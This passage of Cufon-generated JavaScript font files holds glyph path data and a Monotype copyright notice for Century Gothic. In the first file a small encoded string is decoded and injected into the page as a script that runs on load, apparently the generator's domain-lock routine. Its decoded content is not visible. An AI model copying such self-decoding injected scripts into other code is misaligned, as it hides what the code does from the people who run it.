,98,-101v56,0,100,43,100,102r-172,0v-1,42,31,78,72,76xm188,-115v-6,-52,-80,-76,-120,-40v-10,9,-17,22,-22,40r142,0","w":233},{"d":"39,-265r167,300r-27,0r-167,-300r27,0","w":217},{"d":"32,0r0,-259r5,0r172,198r0,-198r26,0r0,259r-6,0r-171,-195r0,195r-26,0","w":266},{"d":"33,-17v0,-12,10,-22,21,-22v12,0,22,10,22,22v0,12,-9,23,-22,22v-12,0,-21,-10,-21,-22","w":99},{"d":"108,5v-98,0,-84,-101,-84,-196r25,0v3,75,-18,178,59,172v46,-3,58,-23,58,-83r0,-89r26,0v0,0,14,196,-84,196","w":218},{"d":"57,-270v41,93,37,257,-7,345r-28,0v45,-87,51,-252,8,-345r27,0","w":132},{"d":"217,-106r0,19r-44,0r-13,87r-19,0r12,-87r-58,0r-13,87r-20,0r14,-87r-44,0r0,-19r47,0r9,-59r-45,0r0,-19r47,0r13,-82r18,0r-11,82r58,0r12,-82r20,0r-13,82r40,0r0,19r-42,0r-9,59r41,0xm165,-165r-58,0r-9,59r58,0","w":259},{"d":"117,-196v37,1,60,17,77,40r0,-35r24,0r0,261r-24,0r0,-103v-18,23,-42,36,-77,38v-53,1,-98,-47,-98,-101v0,-53,45,-101,98,-100xm195,-95v1,-42,-35,-78,-76,-77v-45,1,-76,33,-76,77v0,42,32,77,76,77v44,0,75,-31,76,-77","w":245},{"d":"31,-259r26,0r0,109r132,0r0,-109r26,0r0,259r-26,0r0,-125r-132,0r0,125r-26,0r0,-259","w":245},{"d":"11,-108r97,0r0,22r-97,0r0,-22","w":119},{"d":"33,-174v0,-12,9,-22,21,-22v12,0,23,9,22,22v0,12,-10,21,-22,21v-12,0,-21,-9,-21,-21xm52,-47r24,11r-36,66r-18,-7","w":99},{"d":"16,-250v0,-11,10,-20,21,-20v11,0,20,9,20,20v0,11,-9,21,-20,21v-12,0,-21,-9,-21,-21xm-11,47v21,10,35,5,35,-25r0,-213r25,0r0,220v4,42,-26,55,-60,40r0,-22","w":73},{"d":"33,-174v0,-12,9,-22,21,-22v12,0,23,9,22,22v0,12,-10,21,-22,21v-12,0,-21,-9,-21,-21xm52,-47r24,11r-36,66r-18,-7","w":99},{"d":"52,-47r24,11r-36,66r-18,-7","w":99},{"d":"26,-259r164,0r-138,266r-22,-11r120,-230r-124,0r0,-25"},{"d":"193,-190v-4,67,-55,73,-136,70r0,120r-26,0r0,-259r52,0v74,-3,102,12,110,69xm166,-190v0,-49,-56,-44,-109,-43r0,87v52,2,109,7,109,-44","w":213},{"d":"31,-259r26,0r0,234r100,0r0,25r-126,0r0,-259","w":166},{"d":"67,-259r50,0r0,259r-25,0r0,-233r-41,0"},{"d":"66,-265r0,200r-26,0r0,-200r26,0xm31,-17v0,-27,44,-28,44,0v0,12,-10,22,-22,22v-12,0,-22,-10,-22,-22","w":106},{"d":"129,5v-35,-2,-59,-16,-77,-38r0,103r-24,0r0,-261r24,0r0,35v17,-23,40,-39,76,-40v54,-1,99,47,99,100v0,53,-45,102,-98,101xm202,-95v0,-45,-31,-76,-76,-77v-41,-1,-76,35,-76,77v0,46,33,77,77,77v43,0,75,-34,75,-77","w":245},{"d":"154,-128v21,-1,21,-7,44,-19r0,28v-20,10,-25,15,-44,17v-22,3,-66,-28,-88,-28v-21,0,-26,7,-46,19r0,-29v20,-10,25,-14,44,-16v22,-2,65,29,90,28","w":218},{"d":"6,-191r29,0r51,71r50,-71r30,0r-65,91r73,100r-30,0r-58,-80r-58,80r-29,0r72,-100","w":172},{"d":"103,7v-57,0,-96,-57,-72,-113v24,-55,70,-108,101,-159r21,14r-70,106v53,-20,102,21,101,72v-1,47,-34,80,-81,80xm158,-73v0,-29,-25,-54,-54,-54v-30,0,-55,25,-55,54v0,29,26,54,55,54v28,0,54,-26,54,-54"},{"d":"113,-172v-73,0,-61,94,-61,172r-25,0r0,-191r25,0r0,33v15,-22,34,-38,65,-38v35,1,51,18,61,46v13,-26,36,-45,70,-46v85,-1,62,111,65,196r-25,0v-7,-66,25,-173,-45,-172v-74,1,-60,94,-61,172r-24,0v-6,-66,23,-172,-45,-172","w":337},{"d":"31,-259r27,0r0,97r103,-97r35,0r-124,116r134,143r-35,0r-113,-121r0,121r-27,0r0,-259","w":212},{"d":"157,-85v0,-59,-64,-73,-116,-45r24,-129r112,0r0,25r-92,0r-13,71v61,-20,112,20,112,79v0,102,-158,126,-169,21r26,0v5,28,23,44,54,45v35,1,62,-31,62,-67"},{"d":"77,-172v-1,45,1,64,36,68r0,29v-39,0,-37,40,-36,80v1,55,-12,77,-66,74r0,-27v29,0,37,-5,36,-36v0,-63,1,-87,37,-106v-31,-16,-36,-31,-37,-79v0,-52,6,-60,-36,-62r0,-28v59,-2,67,25,66,87","w":126},{"d":"98,-265v82,-2,89,94,49,155r-78,117r-21,-14r70,-106v-53,20,-101,-21,-100,-72v0,-49,34,-79,80,-80xm43,-185v0,28,26,54,54,54v29,0,55,-25,55,-54v0,-29,-26,-55,-55,-55v-29,0,-54,26,-54,55"},{"d":"20,0r36,-259r5,0r105,213r104,-213r4,0r37,259r-25,0r-26,-185r-91,185r-7,0r-92,-186r-25,186r-25,0","w":330},{"d":"98,7v-66,0,-87,-58,-87,-136v0,-79,19,-136,87,-136v68,0,90,59,90,136v0,77,-23,136,-90,136xm99,-240v-51,6,-63,48,-63,111v0,64,11,112,63,112v52,0,65,-55,65,-112v0,-59,-14,-107,-65,-111"},{"d":"249,-126v0,81,-45,128,-135,126r-83,0r0,-259r54,0v111,-3,164,38,164,133xm223,-126v0,-89,-61,-113,-167,-107r0,209v104,5,167,-13,167,-102","w":267},{"d":"118,-196v36,1,59,17,76,40r0,-109r24,0r0,265r-24,0r0,-33v-18,23,-42,36,-77,38v-53,1,-98,-48,-98,-101v0,-53,45,-101,99,-100xm196,-95v0,-42,-35,-78,-76,-77v-45,1,-76,32,-76,77v0,44,32,77,76,77v44,0,76,-31,76,-77","w":246},{"d":"144,-102v44,64,-39,141,-104,96v-13,-8,-24,-22,-35,-42r22,-13v15,28,33,42,53,42v27,0,48,-17,48,-44v0,-62,-107,-74,-107,-141v0,-49,54,-76,97,-52v11,6,22,17,34,33r-21,16v-16,-20,-22,-29,-48,-31v-36,-3,-46,46,-19,66v13,9,74,54,80,70","w":179},{"d":"27,-265r25,0r0,151r88,-77r37,0r-105,91r111,100r-35,0r-96,-86r0,86r-25,0r0,-265","w":180},{"d":"137,-259r121,259r-28,0r-41,-85r-111,0r-41,85r-28,0r122,-259r6,0xm134,-204r-45,94r89,0","w":266},{"d":"293,-129v-1,46,-18,76,-45,101r39,48r-32,0r-26,-33v-90,57,-212,-14,-208,-115v3,-80,55,-135,135,-137v75,-2,138,62,137,136xm47,-128v-3,81,92,138,165,94r-57,-73r31,0r46,59v70,-63,23,-196,-75,-192v-64,3,-108,47,-110,112","w":313},{"d":"20,-128v2,-80,56,-135,135,-137v76,-2,137,61,137,136v0,74,-61,136,-135,136v-74,0,-138,-62,-137,-135xm266,-129v0,-65,-47,-111,-110,-111v-63,0,-108,47,-109,112v-1,60,49,111,109,109v65,-1,110,-46,110,-110","w":312},{"w":99},{"d":"18,-94v0,-102,146,-136,195,-58r-19,13v-40,-61,-151,-34,-151,43v0,78,109,104,151,45r19,13v-17,25,-47,43,-89,43v-57,0,-106,-43,-106,-99","w":232},{"d":"7,-191r26,0r66,147r63,-147r27,0r-114,261r-26,0r36,-84","w":193},{"d":"12,-191r140,0r-108,169r105,0r0,22r-147,0r108,-170r-98,0r0,-21","w":152},{"d":"11,-108r97,0r0,22r-97,0r0,-22","w":119},{"d":"33,-174v0,-12,9,-22,21,-22v12,0,23,9,22,22v0,12,-10,21,-22,21v-12,0,-21,-9,-21,-21xm33,-17v0,-12,10,-22,21,-22v12,0,22,10,22,22v0,12,-9,23,-22,22v-12,0,-21,-10,-21,-22","w":99},{"d":"12,-259r28,0r86,200r87,-200r28,0r-113,259r-5,0","w":252},{"d":"107,-240v-31,0,-52,19,-52,52r-25,0v-1,-47,31,-77,77,-77v62,0,97,63,52,102v-19,16,-88,25,-87,56v0,16,18,26,36,26v26,0,35,-13,38,-37r26,0v-2,38,-25,62,-64,62v-34,0,-62,-20,-62,-51v0,-65,106,-45,109,-97v1,-22,-23,-36,-48,-36xm85,-17v0,-12,10,-22,22,-22v11,0,21,10,21,22v0,12,-9,22,-21,22v-12,0,-23,-9,-22,-22","w":212},{"d":"21,-129v-1,-102,103,-162,203,-124v19,8,39,21,57,38r-20,19v-24,-24,-58,-43,-98,-43v-64,0,-111,45,-115,109v-8,122,200,156,219,31r-82,0r0,-25r111,0v1,80,-52,129,-130,131v-80,2,-144,-58,-145,-136","w":313},{"d":"-2,27r184,0r0,18r-184,0r0,-18","w":180},{"d":"28,-259r26,0r0,259r-26,0r0,-259","w":81},{"d":"38,-133v-6,114,153,162,216,80r18,0v-29,37,-54,58,-108,58v-82,0,-140,-55,-140,-137v0,-81,56,-137,138,-139v65,-2,126,52,126,113v0,59,-39,99,-90,104v-13,1,-22,-4,-21,-19v-31,38,-101,8,-97,-46v3,-42,30,-85,75,-83v24,1,35,9,46,26r5,-24r19,0r-22,122v0,5,3,10,9,9v34,-6,62,-42,62,-85v0,-58,-53,-102,-113,-101v-74,1,-119,50,-123,122xm157,-183v-56,-3,-75,107,-10,108v50,1,68,-107,10,-108","w":312},{"d":"18,-97v0,-94,127,-132,174,-61r0,-33r25,0r0,152v24,131,-159,148,-197,54r27,0v31,61,167,48,145,-51v-46,66,-174,33,-174,-61xm193,-97v0,-45,-29,-75,-73,-75v-45,0,-76,32,-78,76v-2,42,33,73,76,73v44,0,75,-30,75,-74","w":242}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+129-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("?z{^1J|XS_;i?Rm~]J9bLzL;Mp|^{J;iMpubS_qB{xH2vcXT`c^1|9%kMR;TY9){F-{nMxk.xx`N?z9My@u:l&R*-9z5Lu?ga|4Y`qKVyx_Mv{S1:]fFkCT,@mJB>%e62QiIj7bcX^pnN)o~H;.tLBq%K,|~1bveSRx:]VljvV&b]Jj@:Xy61,LB{Jx:M-Ni]K@,:ykQ4p%:]Vlc|py2|^&aaK9jFBkp1y2^FVm|a-q@ypQ&yyHkvnmoM5yjaz9@4mvtq^;u`z:TgB|j1zmX?RLT?K7%YVl2:*^TgBl21*^jgJ7m1J]XSR7BY_Li{T)B15mjS5a;fnX~S_v>vT)IScXIMTkt4B]n]^ji?VH>Yc%I1Bq%1_xc{MupS_|m:5uI:^jivp;Q?K`ISK)X{M|X?z7Ivp9XS_;igJCI:nqiv_^m?KmJ1nL>4p@H1*26?p@%{^Q,_pm]MV^j_pm]FK@>?Klk")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":199,"face":{"font-family":"Century Gothic","font-weight":400,"font-stretch":"normal","units-per-em":"360","panose-1":"2 11 5 2 2 2 2 2 2 4","ascent":"288","descent":"-72","x-height":"5","bbox":"-11 -281 329 79.2683","underline-thickness":"20.918","underline-position":"-24.2578","unicode-range":"U+0020-U+007E"}}));
/*!
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 * Typeface © The Monotype Corporation plc. Data © The Monotype Corporation plc /
 * Type Solutions Inc. 1990-91 All Rights Reserved
 * 
 * Trademark:
 * Century Gothic is a trademark of The Monotype Corporation plc.
 * 
 * Description:
 * A design based on Monotype 20th Century, which was drawn by Sol Hess between
 * 1936 and 1947. Century Gothic maintains the basic design of 20th Century but has
 * an enlarged 'x' height and has been modified to ensure satisfactory output from
 * modern digital systems. The design is influenced by the geometric style sans
 * serif faces which were popular during the 1920's and 30's. Useful for headlines
 * and general display work and for small quantities of text, particularly in
 * advertising.
 * 
 * Manufacturer:
 * Monotype Typography, Inc.
 * 
 * Designer:
 * Monotype Type Drawing Office
 * 
 * Vendor URL:
 * http://www.monotype.com/html/mtname/ms_welcome.html
 * 
 * License information:
 * http://www.monotype.com/html/type/license.html
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"4,-259r143,0r0,49r-47,0r0,210r-50,0r0,-210r-46,0r0,-49","w":151},{"d":"12,-239v-1,-16,15,-31,31,-31v16,0,31,14,31,31v0,17,-15,31,-31,31v-17,0,-30,-15,-31,-31xm19,-191r48,0r0,191r-48,0r0,-191","w":86},{"d":"100,-219v-23,0,-37,20,-37,44r-48,0v1,-53,36,-90,89,-90v66,-1,99,67,68,126v-14,26,-51,67,-77,93r92,0r0,46r-179,0r0,-24v41,-51,116,-90,128,-161v3,-19,-17,-35,-36,-34"},{"d":"30,-259r50,0r0,89r70,-89r59,0r-90,116r99,143r-59,0r-79,-115r0,115r-50,0r0,-259","w":223},{"d":"67,-265v55,9,125,21,171,-5r35,0r-205,288r-35,0r175,-247v-27,5,-52,6,-81,4v16,43,-17,83,-58,83v-34,0,-63,-28,-62,-61v0,-36,27,-59,60,-62xm99,-203v0,-15,-15,-30,-30,-30v-15,0,-30,15,-30,30v0,15,14,29,30,29v16,0,30,-14,30,-29xm179,-55v0,-33,29,-62,61,-62v33,0,62,29,62,62v0,33,-29,62,-62,62v-33,0,-61,-29,-61,-62xm270,-55v0,-15,-15,-30,-30,-30v-15,0,-30,15,-30,30v0,15,15,30,30,30v15,0,30,-15,30,-30","w":309},{"d":"-2,27r184,0r0,18r-184,0r0,-18","w":180},{"w":100},{"d":"32,-162v-43,-57,29,-130,95,-94v12,6,24,17,38,33r-36,32v-13,-18,-26,-27,-39,-27v-11,0,-22,7,-22,17v17,48,102,68,102,134v0,62,-77,95,-128,60v-14,-9,-25,-24,-35,-43r42,-25v12,23,26,35,42,35v22,1,40,-23,24,-42v-15,-19,-78,-66,-83,-80","w":187},{"d":"31,-118r89,0r0,45r-89,0r0,-45","w":151},{"d":"16,-141v-2,-61,97,-72,125,-24r-29,30v-12,-12,-23,-18,-33,-18v-11,-1,-22,9,-15,19v30,21,81,31,81,79v0,68,-105,79,-136,27r30,-32v10,18,53,35,61,7v3,-11,-24,-24,-37,-30v-31,-16,-47,-35,-47,-58","w":158},{"d":"30,-259r129,0r0,48r-80,0r0,47r80,0r0,48r-80,0r0,116r-49,0r0,-259","w":172},{"d":"11,-259r53,0r48,93r48,-93r52,0r-75,147r0,112r-50,0r0,-112","w":223},{"d":"101,-150v-37,-16,-40,29,-40,73r0,77r-48,0r0,-191r41,0r0,24v9,-22,35,-37,62,-24","w":115},{"d":"53,-176r-27,0r-10,-89r47,0","w":79},{"d":"27,-134v-6,99,127,148,189,81r33,0v-28,36,-53,58,-109,58v-81,0,-139,-58,-139,-138v0,-80,57,-136,139,-138v65,-2,125,52,125,113v0,59,-40,98,-90,104v-13,2,-22,-5,-22,-18v-34,39,-101,5,-96,-48v-8,-62,80,-116,118,-61r4,-19r35,0r-20,115v0,3,3,6,7,6v24,-6,40,-37,40,-69v-2,-60,-42,-97,-102,-97v-67,0,-108,45,-112,111xm101,-124v0,18,11,32,29,32v38,0,50,-72,7,-73v-20,-1,-37,20,-36,41","w":266},{"d":"13,-259r55,0r54,83r55,-83r55,0r-82,126r87,133r-55,0r-60,-91r-59,91r-56,0r88,-133","w":244},{"d":"113,-153v-58,0,-37,92,-41,153r-48,0r0,-191r48,0r0,22v24,-35,100,-36,116,7v14,-19,34,-33,64,-34v88,-3,61,112,65,196r-48,0v-7,-54,21,-153,-33,-153v-59,0,-37,93,-41,153r-48,0v-6,-56,20,-153,-34,-153","w":338},{"d":"10,-259r50,0r66,184r65,-184r51,0r-93,259r-48,0","w":252},{"d":"102,-265v70,0,96,75,62,141r-67,131r-42,-21r46,-88v-44,1,-79,-38,-79,-82v0,-44,37,-81,80,-81xm70,-184v0,19,13,35,33,35v19,0,33,-17,33,-35v1,-18,-15,-35,-33,-35v-18,0,-33,17,-33,35"},{"d":"30,-265r77,0r0,45r-29,0r0,245r29,0r0,45r-77,0r0,-335","w":115},{"d":"99,-227v-16,-4,-31,-7,-32,12r-1,24r31,0r0,41r-31,0r0,150r-48,0r0,-150r-17,0r0,-41r17,0v-9,-73,26,-89,81,-72r0,36","w":100},{"d":"25,-265r48,0r0,153r70,-79r60,0r-82,92r92,99r-59,0r-81,-88r0,88r-48,0r0,-265","w":208},{"d":"47,-49r35,18r-44,74r-24,-12","w":100},{"d":"30,-259r141,0r0,49r-92,0r0,46r92,0r0,48r-92,0r0,68r92,0r0,48r-141,0r0,-259","w":187},{"d":"164,-192v0,36,-16,39,-42,68v21,25,35,40,41,46v4,-3,14,-11,29,-24r29,34r-27,24r42,44r-60,0r-17,-18v-54,39,-142,34,-142,-38v0,-38,19,-54,46,-76v-44,-47,-26,-113,38,-116v35,-2,63,26,63,56xm102,-203v-22,3,-19,27,-4,44v13,-11,20,-20,20,-29v0,-8,-7,-16,-16,-15xm63,-58v7,28,39,23,64,6v-9,-9,-22,-23,-38,-44v-17,14,-26,27,-26,38","w":244},{"d":"10,-259r48,0r38,165r46,-165r41,0r47,165r36,-165r49,0r-58,259r-47,0r-48,-167r-47,167r-47,0","w":323},{"d":"115,7v-63,0,-87,-35,-87,-111r0,-155r49,0r0,168v-1,33,8,50,37,50v32,0,39,-16,39,-56r0,-162r50,0r0,155v3,76,-24,111,-88,111","w":230},{"d":"67,75v-66,-87,-68,-260,0,-345r61,0v-39,44,-62,94,-62,171v0,81,21,123,62,174r-61,0","w":136},{"d":"7,-191r56,0r37,52r38,-52r55,0r-65,90r73,101r-55,0r-46,-63r-45,63r-55,0r73,-101"},{"d":"3,-191r49,0r50,120r55,-120r49,0r-120,261r-50,0r40,-84","w":208},{"d":"114,-152v-60,0,-38,91,-42,152r-48,0r0,-191r48,0r0,19v39,-43,122,-26,122,46r0,126r-48,0v-7,-56,22,-152,-32,-152","w":216},{"w":100},{"d":"94,-265r28,0r0,335r-28,0r0,-335","w":216},{"d":"222,-95v7,79,-97,133,-150,75r0,20r-48,0r0,-265r48,0r0,95v52,-59,160,-8,150,75xm174,-96v0,-32,-22,-56,-52,-56v-30,1,-52,24,-52,56v0,32,22,56,52,57v30,1,52,-26,52,-57","w":237},{"d":"31,-118r89,0r0,45r-89,0r0,-45","w":151},{"d":"16,-191r147,0r-86,150r81,0r0,41r-155,0r86,-151r-73,0r0,-40","w":165},{"d":"58,-265r45,0r-14,53r40,-38r20,39r-53,14r53,15r-23,38r-38,-38r13,53r-43,0r14,-53r-39,38r-24,-38r54,-15r-54,-15r24,-39r39,39","w":158},{"d":"4,-191r49,0r48,113r48,-113r49,0r-82,191r-31,0"},{"d":"54,-259r49,0r59,181r61,-181r48,0r43,259r-47,0r-28,-163r-55,163r-44,0r-54,-163r-28,163r-48,0","w":323},{"d":"15,-95v0,-54,45,-102,99,-101v59,1,102,42,102,100v0,58,-42,99,-102,101v-54,1,-99,-47,-99,-100xm167,-96v0,-31,-22,-56,-52,-55v-29,0,-52,24,-52,55v0,33,21,56,52,56v31,0,52,-25,52,-56","w":230},{"d":"23,-169v0,-15,12,-27,27,-27v16,0,28,11,28,27v0,16,-12,28,-28,28v-16,0,-27,-12,-27,-28xm23,-23v0,-15,12,-27,27,-27v16,0,28,11,28,27v0,16,-12,28,-28,28v-16,0,-27,-12,-27,-28","w":100},{"d":"23,-169v0,-15,12,-27,27,-27v16,0,28,11,28,27v0,16,-12,28,-28,28v-16,0,-27,-12,-27,-28xm48,-49r33,18r-43,74r-24,-12","w":100},{"d":"87,-259r41,0r69,195r-43,0r-46,-132r-46,132r-43,0","w":216},{"d":"16,-259r156,0r-92,212r86,0r0,47r-158,0r92,-210r-84,0r0,-49","w":180},{"d":"86,-151r0,-66r44,0r0,66r66,0r0,44r-66,0r0,66r-44,0r0,-66r-66,0r0,-44r66,0","w":216},{"d":"30,-259r47,0r111,171r0,-171r49,0r0,259r-47,0r-111,-170r0,170r-49,0r0,-259","w":266},{"d":"3,-191r47,0r38,109r42,-109r29,0r40,107r39,-107r47,0r-70,191r-30,0r-41,-109r-42,109r-30,0","w":287},{"d":"19,-265r48,0r0,265r-48,0r0,-265","w":86},{"d":"191,-75v0,49,-33,76,-89,75r-72,0r0,-259v75,-2,142,1,142,67v0,24,-10,38,-26,50v28,12,45,32,45,67xm125,-185v1,-23,-20,-29,-46,-27r0,55v26,1,46,-5,46,-28xm143,-77v0,-30,-27,-38,-64,-36r0,66v35,0,64,-1,64,-30","w":208},{"d":"15,-95v0,-83,98,-134,151,-75r0,-21r47,0r0,261r-47,0r0,-90v-53,58,-151,4,-151,-75xm168,-96v0,-33,-23,-55,-53,-56v-30,0,-52,25,-52,56v0,31,22,58,52,57v31,0,53,-24,53,-57","w":237},{"d":"23,-169v0,-15,12,-27,27,-27v16,0,28,11,28,27v0,16,-12,28,-28,28v-16,0,-27,-12,-27,-28xm48,-49r33,18r-43,74r-24,-12","w":100},{"d":"235,-126v0,87,-42,132,-146,126r-59,0r0,-259r58,0v102,-4,147,44,147,133xm185,-127v0,-61,-36,-89,-106,-84r0,163v71,6,106,-16,106,-79","w":252},{"d":"16,-239v-1,-16,15,-31,31,-31v17,0,31,14,31,31v0,17,-15,31,-31,31v-17,0,-31,-14,-31,-31xm-15,30v20,10,38,6,38,-20r0,-201r48,0r0,197v5,59,-35,82,-86,62r0,-38","w":93},{"d":"15,-95v0,-83,98,-134,151,-75r0,-95r47,0r0,265r-47,0r0,-20v-53,58,-151,4,-151,-75xm168,-96v0,-33,-23,-55,-53,-56v-30,0,-52,25,-52,56v0,31,22,58,52,57v31,0,53,-24,53,-57","w":237},{"d":"78,-42v16,0,16,-13,16,-36r0,-181r49,0r0,172v16,104,-91,118,-136,56r35,-33v12,13,18,22,36,22","w":172},{"d":"196,-64r0,44r-176,-90r0,-39r176,-89r0,44r-125,65","w":216},{"d":"70,-270v66,87,68,260,0,345r-61,0v39,-45,62,-92,62,-171v0,-81,-21,-123,-62,-174r61,0","w":136},{"d":"41,1v0,-46,0,-66,-39,-70r0,-42v35,-2,39,-22,39,-62v0,-70,17,-87,82,-86r0,43v-27,1,-37,-1,-36,25v0,44,-1,86,-33,102v31,22,31,35,32,96v0,30,8,28,37,30r0,42v-62,2,-82,-13,-82,-78","w":122},{"d":"99,7v-68,0,-107,-85,-61,-142r66,-130r42,21r-45,88v45,-2,79,38,79,82v0,43,-38,81,-81,81xm132,-75v0,-19,-14,-35,-34,-35v-18,0,-32,16,-32,35v0,18,15,35,32,35v18,0,35,-16,34,-35"},{"d":"119,-265r49,0r0,166r23,0r0,46r-23,0r0,53r-48,0r0,-53r-113,0r0,-46xm120,-99r0,-86r-59,86r59,0"},{"d":"17,-129v2,-80,56,-134,135,-136v72,-2,133,63,133,137v0,74,-61,135,-133,135v-74,0,-137,-63,-135,-136xm236,-129v0,-48,-39,-88,-85,-88v-48,0,-85,40,-85,89v0,49,38,86,86,87v47,1,84,-40,84,-88","w":302},{"d":"59,-119v-19,1,-25,9,-41,20r0,-56v68,-47,120,53,181,-5r0,57v-48,32,-93,-7,-140,-16","w":216},{"d":"59,-259r74,0r0,259r-49,0r0,-212r-53,0"},{"d":"16,-98v-8,-82,97,-130,150,-72r0,-21r47,0r0,164v19,122,-169,134,-197,41r53,0v17,23,81,21,92,-5v3,-6,5,-18,5,-33v-52,56,-158,5,-150,-74xm168,-98v0,-30,-23,-53,-52,-53v-29,0,-52,23,-52,53v0,31,23,55,53,55v30,1,51,-24,51,-55","w":237},{"d":"23,-23v0,-15,12,-27,27,-27v16,0,28,11,28,27v0,16,-12,28,-28,28v-16,0,-27,-12,-27,-28","w":100},{"d":"20,-189r176,0r0,44r-176,0r0,-44xm20,-114r176,0r0,44r-176,0r0,-44","w":216},{"d":"183,-184v-3,56,-35,77,-104,74r0,110r-50,0r0,-259v82,-3,158,-1,154,75xm135,-184v0,-26,-26,-26,-56,-26r0,52v30,1,56,2,56,-26"},{"d":"137,-81v0,-39,-48,-55,-68,-25r-40,-9r31,-144r121,0r0,46r-84,0r-11,47v54,-14,99,30,99,83v0,72,-89,118,-145,71v-16,-13,-27,-30,-32,-52r52,0v13,39,77,28,77,-17"},{"d":"26,-265r49,0r0,189r-49,0r0,-189xm20,-25v0,-15,15,-30,30,-30v16,0,31,14,31,30v0,16,-15,30,-31,30v-15,0,-30,-15,-30,-30","w":100},{"d":"18,-131v-7,-125,176,-181,250,-85r-34,34v-52,-65,-167,-33,-167,52v0,83,131,127,164,45r-75,0r0,-46r130,0v3,80,-48,138,-128,138v-84,0,-135,-56,-140,-138","w":302},{"d":"195,-119r0,35r-40,0r-13,84r-35,0r12,-84r-34,0r-12,84r-35,0r12,-84r-39,0r0,-35r45,0r5,-33r-39,0r0,-35r44,0r11,-78r35,0r-11,78r33,0r12,-78r35,0r-11,78r35,0r0,35r-40,0r-5,33r35,0xm129,-152r-34,0r-4,33r33,0","w":216},{"d":"108,5v-67,0,-86,-38,-84,-117r0,-79r49,0v6,55,-22,150,35,151v59,1,29,-96,36,-151r48,0r0,81v2,80,-18,115,-84,115","w":216},{"d":"222,-95v7,79,-97,133,-150,75r0,90r-48,0r0,-261r48,0r0,21v52,-59,160,-8,150,75xm174,-96v0,-32,-22,-56,-52,-56v-30,1,-52,24,-52,56v0,32,22,56,52,57v30,1,52,-26,52,-57","w":237},{"d":"10,-127v0,-83,22,-138,90,-138v72,0,92,56,92,136v0,80,-19,136,-91,136v-71,0,-91,-53,-91,-134xm101,-39v55,5,48,-125,30,-160v-7,-14,-18,-19,-30,-19v-40,0,-42,42,-42,92v0,52,7,84,42,87"},{"d":"82,-180v0,46,-1,66,38,69r0,42v-34,4,-41,22,-39,63v3,70,-17,86,-81,85r0,-42v27,-1,35,0,36,-25v0,-43,0,-88,33,-102v-32,-21,-32,-35,-33,-96v0,-29,-6,-30,-36,-30r0,-43v61,-1,82,15,82,79","w":122},{"d":"114,-196v63,1,107,45,102,114r-154,0v3,46,71,60,101,26r40,19v-18,26,-44,42,-86,42v-59,0,-102,-44,-102,-100v0,-56,44,-102,99,-101xm168,-120v-10,-45,-92,-48,-104,0r104,0","w":230},{"d":"85,70r-77,0r0,-45r29,0r0,-245r-29,0r0,-45r77,0r0,335","w":115},{"d":"67,-295r42,69r-34,0r-65,-69r57,0","w":151},{"d":"26,-259r49,0r0,259r-49,0r0,-259","w":100},{"d":"15,-95v-5,-101,146,-135,196,-58r-39,22v-31,-39,-109,-19,-109,37v0,56,79,73,109,33r37,26v-21,27,-49,40,-86,40v-63,0,-105,-44,-108,-100","w":230},{"d":"54,-144v-54,-33,-26,-124,39,-121r0,-18r33,0r0,20v27,7,37,15,57,34r-34,33v-15,-16,-31,-24,-46,-24v-22,-1,-42,25,-23,40v41,33,117,36,113,107v-2,44,-25,72,-67,79r0,47r-33,0r0,-46v-38,-5,-59,-21,-81,-44r34,-35v21,23,42,35,62,35v27,1,49,-34,30,-57v-15,-18,-75,-39,-84,-50"},{"d":"101,-226v-20,1,-38,13,-37,34r-46,0v-1,-47,37,-78,85,-78v48,0,78,28,80,72v2,59,-67,59,-63,123r-47,0v-9,-53,37,-83,58,-110v14,-19,-5,-42,-30,-41xm67,-25v0,-16,14,-30,30,-30v18,0,31,14,31,30v1,15,-15,30,-30,30v-16,0,-31,-14,-31,-30"},{"d":"115,-176r-28,0r-9,-89r47,0xm43,-176r-28,0r-10,-89r47,0","w":129},{"d":"17,-130v0,-133,179,-177,250,-83r-34,33v-52,-67,-167,-37,-167,50v0,93,122,115,167,52r33,35v-34,32,-57,49,-112,50v-78,1,-137,-57,-137,-137","w":280},{"d":"190,46r-34,0r-116,-312r34,0","w":230},{"d":"152,-265v110,-5,178,146,99,227r45,58r-58,0r-23,-29v-91,50,-202,-24,-198,-120v3,-79,56,-133,135,-136xm66,-128v0,59,61,105,119,80r-46,-60r58,0r24,30v40,-57,-4,-139,-69,-139v-49,0,-86,40,-86,89","w":302},{"d":"20,-194r0,-44r176,89r0,39r-176,90r0,-44r126,-65","w":216},{"d":"30,-262r48,0r0,71r28,0r0,41r-28,0r0,150r-48,0r0,-150r-25,0r0,-41r25,0r0,-71","w":107},{"d":"30,-259r49,0r0,212r71,0r0,47r-120,0r0,-259","w":158},{"d":"126,-193v2,-35,-53,-29,-58,-2r-47,0v4,-41,38,-70,80,-70v40,0,75,30,75,68v0,27,-16,45,-37,55v93,27,43,153,-41,149v-51,-2,-85,-35,-87,-85r48,0v4,23,16,40,42,39v21,0,41,-17,40,-38v-2,-27,-27,-43,-60,-42r0,-42v26,-2,43,-10,45,-32"},{"d":"22,-259r169,0r0,26r-116,240r-42,-21r97,-198r-108,0r0,-47"},{"d":"187,-184v-1,38,-20,58,-50,69r62,115r-54,0r-58,-110r-5,0r0,110r-49,0r0,-259v83,-3,155,-1,154,75xm139,-184v-1,-27,-25,-27,-57,-26r0,52v30,0,58,2,57,-26","w":208},{"d":"8,46r116,-312r34,0r-116,312r-34,0","w":165},{"d":"15,-95v0,-83,98,-134,151,-75r0,-21r47,0r0,191r-47,0r0,-20v-53,58,-151,4,-151,-75xm168,-96v0,-33,-23,-55,-53,-56v-30,0,-52,25,-52,56v0,31,22,58,52,57v31,0,53,-24,53,-57","w":237},{"d":"101,-265v70,-6,101,85,53,125v22,14,37,36,37,67v0,50,-35,80,-90,80v-92,0,-116,-109,-54,-147v-47,-39,-18,-1